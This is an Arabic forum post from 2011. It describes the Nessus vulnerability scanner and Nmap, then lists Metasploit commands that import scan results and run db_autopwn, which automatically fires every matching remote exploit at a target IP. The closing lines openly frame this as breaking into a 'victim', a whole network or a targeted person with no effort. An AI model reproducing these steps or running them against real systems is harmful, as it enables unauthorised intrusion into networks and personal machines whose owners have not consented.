الان راح نعطيكم لمحة عن الموضوع وكيفية الاستخدام وان شاء الله تكون معلومات شاملة تكفي كل شي :
Nusses عبارة عن برنامج فعال جدا ويظهر لنا الكثير من المعلومات مثل المنافذ المفتوحة (ports)
الخدمات المستخدمة واصدارتها الثغرات الموجودة في السيرفر وطرق ترقيعها والكثير من الامور اي بسطنا
المعلومة الفحص ويستخدم للاجهزة (شخصية , شبكة , ... الـخ ) او سيرفر وهو نسخة مجانية
(مفتوحة المصدر ) تستخدم على الينكس والوندوز ..
ايضا ان هنالك نسخة منه عبارة عن GFI وهي نسخة مدفوعة ويعيبة شي انه مرتفع المصدر وثقيل يعني بالحيل
وعلى حسب معرفتي مايوجد له نسخة ليونكس
في الينكس نحتاج تنصيب الاداة ويسمى السيرفر بالاضـافة الـى NessusClientوهو الواجهة الرسومية المستخدمة في نظام لينوكس والتي ستتحكم بواسطتها بسيرفر Nessus وبما أن البرنامج يعمل بشكل سيرفر فمن الممكن تنصيبه على جهاز والتحكم به من جهاز آخر وتستطيع اضافة عدة مستخدمين للتحكم به الموقع الرسمي
كود PHP:
www.nessus.org
ومن مايعرف البرنامج هذا انه برنامج لفحص المنافذ والخدمات وو وووو وووو الــخ مشهور ومعروف ومو
بحاجة نتكلم عنه وموجد على الباك تراك عشان كذا بنتعمق عن الاداة الاخرى وهذا الموقع الرسمي
كود PHP:
http://nmap.org
الان نوضح النتصيب والاستخدام :
كود PHP:
apt-get install nessusd nessus
كذا انتهينا من الفحص ولكن انت احفظ الفحص عشان تسوي لة اسيراد عشان تسخدمة من الميتا
كود PHP:
db_driver sqlite3
كود PHP:
db_create قاعدة.db
كود PHP:
db_import nessus nbe /root/ملف الفحص.nbe
كود PHP:
db_nmap IP
كود PHP:
db_autopwn -t -e -x -p
طيب الاداة هذه ايش الفايدة منها تقوم بتجريب جميع ثغرات الريموت على جميع منافذ وبرامج وخدمات
الموجودة او المكتشفة في المشروع الميتا وانت جالس تشرب شاي
كذا تم الاستغلال والاتصال ويا الضحية واذا ناوي على شبكة بتخترقها على طول واذا مستهدف شخص شوف الي بيصير اتمنى ان الموضوع اعجبكم وكان واضح
وان شاء الله نلتقي في مواضيع اخرى
02-14-2011, 02:09 PM
Using Nessus & Nmap With M e t a s p l o it & db_autopwn 
العرض الشجري
